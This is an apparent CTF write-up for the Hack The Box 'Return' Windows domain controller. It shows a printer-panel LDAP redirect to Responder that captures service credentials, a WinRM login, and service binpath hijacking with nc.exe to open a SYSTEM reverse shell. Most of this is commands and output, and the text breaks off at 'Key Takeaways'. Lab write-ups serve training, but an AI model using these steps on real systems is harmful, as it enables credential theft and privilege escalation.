Return Writeup

17 September 2022 #CTF #HTB #box #easy #windows

return info


I don't have inspiration for this one (sorry):

$ sudo nmap -Pn -A -oN enum/1000tcp.nmap
53/tcp   open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp   open  http          syn-ack ttl 127 Microsoft IIS httpd 10.0
|_http-title: HTB Printer Admin Panel
| http-methods: 
|   Supported Methods: OPTIONS TRACE GET HEAD POST
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
88/tcp   open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2022-09-15 21:29:29Z)
135/tcp  open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp  open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds? syn-ack ttl 127
464/tcp  open  kpasswd5?     syn-ack ttl 127
593/tcp  open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped    syn-ack ttl 127
3268/tcp open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped    syn-ack ttl 127
Host script results:
| smb2-security-mode: 
|   3.1.1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2022-09-15T21:29:41
|_  start_date: N/A
|_clock-skew: 18m33s

It looks very much like an Active Directory Domain Controler.


The box has DNS listening on tcp so we can try a zone transfer:

$ dig @ return.local axfr

; <<>> DiG 9.18.6-2-Debian <<>> @ return.local axfr
; (1 server found)
;; global options: +cmd
; Transfer failed.

(We got the hostname from the nmap scan)

Nothing, let's move on.


Looking at the website, it says 'HTB Printer Admin Panel'. There is a 'Settings' page:

printer settings page

Let's inspect the HTML to see if this is an actual password:

Unlucky, it's just plain text.

We can click on this 'Update' button and intercept the request with Burp to see what it is doing:

intercept request with Burp

No sign of the other parameters on the form, but there is this 'ip' parameter that is interesting.

We will change it to our local box ip address, but before that let's setup responder:

$ sudo responder -I tun0

Now forward the request with the modified ip parameter and check if responder caught something:

[LDAP] Cleartext Client   :
[LDAP] Cleartext Username : return\svc-printer
[LDAP] Cleartext Password : 1edFg43012!!

Sweet, we have some creds.


Check if we can winRM with crackmapexec:

$ crackmapexec winrm -u svc-printer -p '1edFg43012!!'
SMB    5985   PRINTER          [*] Windows 10.0 Build 17763 (name:PRINTER) (domain:return.local)
HTTP    5985   PRINTER          [*]
WINRM    5985   PRINTER          [+] return.local\svc-printer:1edFg43012!! (Pwn3d!)

Looks like we can. We'll use evil-winrm:

$ evil-winrm -i -u svc-printer -p '1edFg43012!!'
*Evil-WinRM* PS C:\Users\svc-printer\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\svc-printer\desktop> ls

    Directory: C:\Users\svc-printer\desktop

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/17/2022   1:37 AM             34 user.txt

Be sure to quote the password as !! is interpreted by bash (it evaluates to the last command run).


We can get a lot of useful information with commands like whoami /all and net user:

*Evil-WinRM* PS C:\Users\svc-printer\desktop> whoami /all

Everyone		    Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators    Alias            S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
Privilege Name                Description                         State
============================= =================================== =======
SeMachineAccountPrivilege     Add workstations to domain          Enabled
SeLoadDriverPrivilege         Load and unload device drivers      Enabled

We can abuse 'SeLoadDriverPrivilege' by loading a malicious driver. There is also this 'Server Operators' group that is really good for us. Members of this group can (among other things) modify, start and stop services.

This means we can stop a service, modify its binary's path to something naughty (like nc or whatever) and start it again.

First, let's find a service to abuse:

*Evil-WinRM* PS C:\Users\svc-printer\desktop> get-service
Cannot open Service Control Manager on computer '.'. This operation might require other privileges.
At line:1 char:1
+ get-service
+ ~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (:) [Get-Service], InvalidOperationException
    + FullyQualifiedErrorId : System.InvalidOperationException,Microsoft.PowerShell.Commands.GetServiceCommand

*Evil-WinRM* PS C:\Users\svc-printer\desktop> sc.exe query
[SC] OpenSCManager FAILED 5:

Access is denied.

Hmm, weirdly enough we can't list services. We'll use the service shown in this post which has a lot of really good information for Active Directory privesc.

evil-winrm has a nice feature that enables you to upload a file from your local box to the target:

*Evil-WinRM* PS C:\Users\svc-printer\desktop> upload /usr/share/windows-binaries/nc.exe C:\Users\svc-printer\desktop\nc.exe
Info: Uploading /usr/share/windows-binaries/nc.exe to C:\Users\svc-printer\desktop\nc.exe

Data: 79188 bytes of 79188 bytes copied

Info: Upload successful!

Now let's modify the service's config and restart it and hopefuly get a reverse shell:

*Evil-WinRM* PS C:\Users\svc-printer\desktop> sc.exe stop vss
[SC] ControlService FAILED 1062:

The service has not been started.
*Evil-WinRM* PS C:\Users\svc-printer\desktop> sc.exe config vss binpath="cmd.exe /c C:\users\svc-printer\desktop\nc.exe -e powershell 4242"
[SC] ChangeServiceConfig SUCCESS
*Evil-WinRM* PS C:\Users\svc-printer\desktop> sc.exe start vss

We have to use cmd.exe /c <payload> to make sure our shell doesn't die after 30 seconds or so.

And if all went well, we should have a reverse shell as nt authority\system.

Key Takeaways